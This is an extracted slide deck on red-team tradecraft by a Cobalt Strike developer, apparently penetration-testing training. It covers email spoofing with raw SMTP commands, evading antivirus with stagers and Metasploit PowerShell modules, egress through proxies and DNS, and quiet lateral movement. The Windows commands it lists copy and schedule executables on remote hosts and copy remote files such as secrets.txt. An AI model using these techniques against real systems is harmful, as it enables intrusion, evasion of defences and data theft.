TOOLS AND TRADECRAFT • Raphael Mudge – Principal, Strategic Cyber LLC – Developer, Cobalt Strike – Resident, Washington DC • • • • • How to get a Foothold Message Delivery Code ExecuCon Egress Stay Quiet 1. 2. 3. 4. 5. Map client-‐side aHack surface Create Virtual Machine for tesCng purposes Use Virtual Machine to select best aHack Configure and disguise the aHack Email aHack package to vicCm • Defense (DKIM, SPF, and DMARC) idenCfy spoofed messages • AHacker send email from aHacker controlled domain OR spoof a domain with no validaCon informaCon # telnet mail server 25 HELO whatever.com MAIL FROM: <[email protected]> RCPT TO: <target email here> DATA message data . QUIT # telnet mail server 25 HELO whatever.com MAIL FROM: <[email protected]> RCPT TO: <target email here> DATA message data . QUIT # telnet mail server 25 HELO whatever.com MAIL FROM: <[email protected]> RCPT TO: <target email here> DATA message data . QUIT • Sender Policy Framework (SPF) – dig +short TXT domain.com • DomainKeys IdenCfied Mail (DKIM) • Domain-‐based Message AuthenCcaCon, ReporCng and Conformance (DMARC) – dig +short TXT _dmarc.domain.com • Accepted Domains (MS Exchange Feature) • Defense (AnC-‐virus) check for known bad and stop it • AHacker get code into memory without known bad • False posiCves are bad • Non-‐intrusive(?) • Only checks file at certain points – When loaded in browser – When wriHen to disk • Check for known signature • Apply heurisCc to detect bad behavior • Emulate binary to defeat packers and crypters 1. Find out or guess which anC-‐virus is in use 2. Put anC-‐virus on test Virtual Machine 3. Select undetected aHack or modify exisCng aHack STAGERS and Exploits • Use AV-‐safe stager EXE – Easy to write in a pinch – Tools exist to generate AV-‐safe stagers (e.g. Veil) • Avoid an EXE if possible – exploit/windows/smb/psexec_psh – exploit/windows/misc/psh_web_delivery 1. 2. 3. 4. 5. 6. 7. Connect to aHacker Read integer containing stage-‐2 length Read [stage length] bytes Allocate RWX buffer Move connecCon to EDI register Copy stage data to RWX buffer Pass control to stage See: hHps://github.com/rsmudge/metasploit-‐loader • Use AV-‐Safe Client-‐side Exploit – Custom Java Applet AHack – MS Office Macro • Modify Metasploit Client-‐side Exploit – Change strings in module • Defense (ApplicaCon WhitelisCng) do not allow unapproved applicaCons • AHacker get agent into memory using a white-‐listed applicaCon. • Use aHacks that inject directly into memory – Custom Java Applet AHack – MS Office Macro • Get into memory with PowerShell – exploit/windows/smb/psexec_psh – exploit/windows/misc/psh_web_delivery • Defense (Firewall) limit which protocols may leave network • AHacker communicate over allowed protocol • Deny all outbound traffic • Allow egress only through a proxy device – AHack traffic must conform to expected protocol – Must pass other checks as well… • AHacker LimitaCon: Staging! • Stagers are sized constrained – smaller is beHer • If payload can’t stage… it can’t execute • If protocol works for staging; C2 is OK • Set EnableStageEncoding to avoid this… • Metasploit Framework HTTP/HTTPS Stagers – Transparent Proxy? OK – AutomaCc NTLM Auth to Proxy? OK – StaCc Username and Password on Proxy? Not OK • Other ways out? DNS – ~184 bytes per DNS TXT record request – ~550 DNS TXT requests to move 100KB of data • Defense (Network Security Monitoring) alert on observed aHacker acCons on network • AHacker – Limit noisy acCvity – Use low & slow C2 strategy • Do not scan hosts… – (ab)use acCve directory to discover hosts • Use Windows commands to accomplish goals – upload / schedule an executable via a command shell is safer than launching an exploit • Use normal clients to interact with systems – Browser Pivot to interact with internal websites – RDP, SSH, etc. How do I… Do this… Find out which domain I trust net view /DOMAIN See some hosts in the domain net view /DOMAIN:[domain] See which hosts are DCs for a domain nltest /dclist:[domain] Map a NetBIOS name to an IPv4 address ping –n 1 -‐4 [name] • Where are you an administrator? windows/gather/local_admin_search_enum • Copy a file to a host copy file.exe \\host\C$ • What Cme is it on the target host? (cmd.exe) net time \\host • Schedule a task to run (cmd.exe) at \\host hh:mm c:\file.exe Note: at is deprecated. Use schtasks or wmic • Use UNC path to reference files on other host • List files in c:\foo on remote host dir \\host\C$\foo • Copy remote c:\foo\secrets.txt to current host copy \\host\C$\foo\secrets.txt . • Go shopping for files on remote host dir /S \\host\C$ >files.txt • Use a slow asynchronous payload! – sleep Cme of minutes to hours (with jiHer) – Call home to mulCple domains • When you go interacCve… – Spawn interacCve sessions to another server (don’t burn your primary C2 server) – Go interacCve only when necessary (or at night) • • • • • Get a Foothold Message Delivery Code ExecuCon Egress Stay Quiet TradecraC Course hHp://www.advancedpentest.com/training My Contact InformaGon raffi@strategiccyber.com Correspondence in 140 chars @armitagehacker
© Copyright 2024 ExpyDoc
